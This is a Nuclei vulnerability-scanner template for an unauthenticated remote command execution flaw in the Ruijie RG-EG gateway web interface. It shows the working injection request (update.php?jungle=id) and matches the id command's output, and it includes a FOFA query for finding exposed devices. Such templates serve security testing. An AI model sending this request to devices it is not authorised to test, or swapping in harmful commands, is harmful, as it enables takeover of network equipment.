nuclei-templates/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2023-12-25 01:05:52 +00:00
id: ruijie-rg-eg-web-mis-rce
info:
name: Ruijie RG-EG - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: |
Ruijie RG-EG easy gateway WEB management system front-end RCE has a command execution vulnerability. An attacker without identity authentication can execute arbitrary commands to control server permissions.
reference:
- https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_WEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
metadata:
verified: true
max-request: 1
fofa-query: body="请输入您的RG-EG易网关的用户名和密码"
tags: ruijie,router,iot,rce
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "ruijie")'
condition: and
- method: GET
path:
- "{{BaseURL}}/update.php?jungle=id"
2023-12-25 17:47:23 +00:00
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
condition: and
# digest: 4a0a004730450220298e4a509f8a4ada203541928158a36e026d8558df1144d2456f0fcac669d723022100b0a5525c3c77ed802dbb654d57bf01b32bf01a811ee1acc813e65a87559786f1:922c64590222798bb761d5b6d8e72950